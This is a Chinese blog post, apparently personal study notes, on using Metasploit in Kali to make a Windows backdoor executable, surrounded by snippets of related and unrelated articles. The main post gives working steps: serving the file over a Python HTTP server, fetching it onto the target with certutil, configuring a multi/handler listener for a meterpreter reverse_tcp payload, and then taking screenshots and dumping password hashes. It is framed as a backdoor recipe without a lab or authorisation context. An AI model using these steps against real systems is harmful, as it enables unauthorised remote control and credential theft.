Kali之metasploit学习

最新推荐文章于 2024-08-14 15:20:01 发布
最新推荐文章于 2024-08-14 15:20:01 发布
阅读量431 收藏 1
点赞数 11
分类专栏: 网络安全之Kali学习 文章标签: 学习
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_42515203/article/details/139635502
版权

目标:尝试使用metasploit制作一个windows 后门(exe文件)

一:使用metasploit生成一个exe安装包。

二、将对应的可执行文件放入到目标机

python3 -m http.server 端口号: 模块化启动一个端口。

windows 证书管理工具:certutil ,可以使用它来下载文件。

例如:certutil -urlcache -split  -f  http://目标ip地址:端口号

三、开启metasploit监听msfconsole

msf 的使用法则:

1.使用模块 use

2. 配置模块必选项:set

3.运行模块:run

具体实践步骤如下:

1. 输入msfconsole进入msf6命令行

2.使用模块 并设置相关参数

# 使用 攻击/多重/句柄 
use exploit/multi/handler  

# 和之前生成exe文件的保持一致
# 设置payload
set payload windows/x64/meterpreter/reverse_tcp

# 设置ip 
set lhost 192.168.*.*

# 设置端口
set lport 9000

3.运行run 

四、尝试获取目标机(windows)信息

截图命令:screenshot

密码:hashdump (当密码超过8位,且有多种元素,就无法破解了)

数字兴
关注
  • 11
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Metasploit 学习 指南— 基础篇
12-23
Author:阿德马 Site:http://www.nxadmin.com Metasploit 是一款强大的渗透测试平台,其中包括了很多渗透测试利器,本文简单介绍一下 Metasploit 的配置和基础的使用方法,主要包括以下几个方面: 网上朋友总结的,在此谢过!讲述kali linux
kali渗透攻击
tanjing7584239的博客
04-10 1799
通过不断地尝试和实践,我逐渐掌握了这些工具的使用方法,并能够在模拟环境中成功地进行渗透测试。在学习的过程中,我深刻体会到了网络安全的重要性。通过不断学习和实践,我逐渐掌握了渗透测试的基本技能和方法,并能够在实际工作中应用这些技能来发现和解决安全问题。我相信在未来的学习和工作中,我会继续努力提高自己的网络安全水平,为网络安全事业做出更大的贡献。因此,在进行渗透测试之前,必须获得授权和许可,并严格遵守相关的法律法规和道德规范。通过这段时间的学习和实践,我收获颇丰,也深刻体会到了渗透测试的重要性与复杂性。
kalimetasploit (msf)初始化使用
热门推荐
StriveBen的博客
06-14 2万+
首先启动postgresql,命令在图中; 然后初始化数据库 进入msf框架 查看一下数据库状态 如果不太熟悉,可以查看具体使用手册 如果执行search时,很慢,而且还提示Module database cache not build yet的话, 我们可以这样解决问题 将数据库再次初始化,并且重新建一下cache,再试一下是不是很快了。
Kali LinuxMetasploit简介及信息收集模块使用
大方子
02-03 2866
Metasploit介绍及配置—— Metasploit就是一个漏洞框架,它的全称叫做The Metasploit Framewor简称叫做MSF 作为金球最受欢迎的工具,不仅仅又是因为它的方便性和强大性,更重要的是它的框架,它允许使用者开发自己的漏洞脚本,从而进行测试。   专业术语: exploit(渗透攻击) 测试者利用系统,程序,或服务的漏洞进行攻击的一个过程。 payload...
kali使用Metasploit进行渗透攻击
lhf13036943631的博客
05-06 751
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
kali2.0 metasploit安装
纯心缺
10-23 1万+
奇怪了,我找了几遍,我的kali竟然没有metasploit,我非常的奇怪,所以我就安装了。 1.一条代码就可以安装了 apt-get install metasploit-framework 2.安装完成后, 首先启动postgresql数据库: /etc/init.d/postgresql start;或者 service postgresql start  设置postgre...
Kali渗透之Metasploit基本使用方法
m0_56988395的博客
02-18 3019
目录 启动 ​ 常用命令 1、核心命令中的connect命令 2、模块相关命令show使用方法 3、模块相关命令search搜索的使用方法 4、模块相关命令use的使用方法 Metaspoit是一个渗透测试平台,能够查找,利用和验证漏洞。 官网:Metasploit | Penetration Testing Software, Pen Testing Security | Metasploit 启动 msfconsole 常用命令 1、核心命令中的connect命令.
Kali虚拟机中Metaspolit的学习和应用
Time_worm的博客
07-13 656
以上部分只是入门Metasploit的基础知识,想要真正学会使用,还要结合具体实例,比如各种漏洞的复现来学习
更新KaliMetasploit框架,这些过程千万不要踩雷
weixin_59086772的博客
02-24 4109
本篇文章为大家分享在更新kaliMetasploit框架过程中容易踩的坑,已帮各位实践,下次更新时可避免。 Kali就不做过多介绍了,初学者一般都知道它的作用,就简单介绍Metasploit是一款免费可下载的框架,通过它可以很容易地获取开发并针对软件漏洞尝试攻击,它本身附带数千个已知软件漏洞的专业级漏洞攻击工具。 前言 不想升级一整个kali,就想把MSF框架更新一下,从版本5更新到把版本6 好家伙,不更新不知道,一更新直接呆住了,时间长不说还繁琐。 apt install metasploit
Metasploit学习资料.zip
02-06
了解如何在Kali Linux中集成和使用Metasploit学习过程中的重要部分。 5. **文本文件1pass00.txt**:此文件可能包含密码、笔记或其他与Metasploit相关的数据,对于理解整个渗透测试过程可能会有所帮助。 6. **...
Metasploit安全工程师必备/学习【魔鬼训练营】 pdf文档
11-09
Metasploit安全工程师必备/学习【魔鬼训练营】》是一个专门为安全工程师设计的深入学习资源,主要聚焦于Kali Linux中的Metasploit框架。Metasploit是信息安全领域中最广泛使用的开源工具之一,用于进行安全漏洞...
metasploit魔鬼训练营》学习中遇到的相关问题
08-19
学习metasploit魔鬼训练营》的过程中,遇到很多的问题,从搭建环境到进行测试,作为一个新手,踩过一些坑,记录下来,以备后查。
kali-linux 工具Metasploit离线式攻击使用教程
12-29
在IT安全领域,Kali Linux是一款著名的开源渗透测试操作系统,其中包含了各种安全工具,而Metasploit则是其中的重要组件之一,主要用于进行安全漏洞利用和红队演练。本教程将聚焦于Metasploit的离线攻击使用方法,这...
Kali操作系统上使用metasploit
weixin_55280439的博客
03-29 3229
meterpreter 是强大的后渗透模块,可以输入help 查看帮助信息,远程控制、命令执行、摄像头监控、密码获取、创建后门用户、破坏篡改系统.......这些看起来非常复杂又高级的操作都能用meterpreter 中的一行或几个字母,简单的命令完成。[*Payload 是攻击载荷,就是攻击完成后想获取的东西,这里是想获取 meterpreter](注:显示攻击失败表示目标主机上没有此漏洞,此漏洞只适用于攻击自己的win7靶机,高版本的系统已经修复此漏洞,显示WIN 表示攻击成功,其他则是失败)
VTK-vtkStructuredGrid学习
最新发布
weixin_69505365的博客
08-14 358
可以理解为单元格顺序沿着坐标轴排列,但是每个单元格可以不一样。维度理解为X/Y/Z方向的点数,如草图所示分别是4,3,1。此时只提供了12个点,只能构造一层,5.点图、线图、面图如下,对应行的代码改一下出现不同效果图。7.增加Z方向维度,点也要增加,点序保持一致。6.点可以不在同一个平面,随机改变点Z数值。2.获取这些点信息,点顺序要严格按照图示。直接赋值第一层的12个点,改一下Z值。所以Z方向维度是1,不能是其他数据。1.使用CAD随意绘制个网格草图。4.将上面的网格显示出来。
fme处理空间数据入门v0
weixin_43229258的博客
08-13 731
本教程是最最最基本的fme处理空间数据内容,给新同事介绍我以前是怎么干活用的,基本啥有用的东西。本教程主要说如何在 FME Workbench中创建模板文件(一般我们把fme写的工作空间就叫模板),教程里面主要是利用GIS数据。按照分步说明操作,1.了解如何从读取数据;2.添加转换器以在空间上过滤数据;3.将过滤后的数据写入 Esri Shapefile;4.如何运行模板文件。
【Python】python中抽象类学习笔记
qq_42761751的博客
08-12 415
抽象类是一个不能被实例化的类,通常作为其他类的基类抽象方法是一个没有具体实现的方法一个抽象类可以有或者没有抽象方法, 但是一般来说定义抽象类的时候总会在类中定义抽象方法Python并没有直接支持抽象类,但是提供了一个模块(abc)来允许定义抽象类通过继承abc.ABC类定义一个抽象类pass上述代码中类虽然继承了ABC但是没有定义抽象方法,仍然可以被实例化。"""使用@abstractmethod来定义抽象方法"""passmain()代码报错:不能实例化一个带有抽象方法的抽象类。
kali安装metasploit
06-06
要在Kali Linux上安装Metasploit,您可以按照以下步骤进行操作: 1. 打开终端并更新Kali Linux的软件包: ``` sudo apt-get update sudo apt-get upgrade ``` 2. 安装依赖项: ``` sudo apt-get install build-essential libreadline-dev libssl-dev libpq5 libpq-dev libreadline5 libsqlite3-dev libpcap-dev git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ``` 3. 安装Ruby: ``` sudo apt-get install ruby-full ``` 4. 克隆Metasploit存储库: ``` cd /opt sudo git clone https://github.com/rapid7/metasploit-framework.git ``` 5. 安装bundler: ``` sudo gem install bundler ``` 6. 安装依赖项: ``` cd metasploit-framework sudo bundle install ``` 7. 运行msfconsole: ``` sudo ./msfconsole ``` 现在,您已经成功安装了Metasploit
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值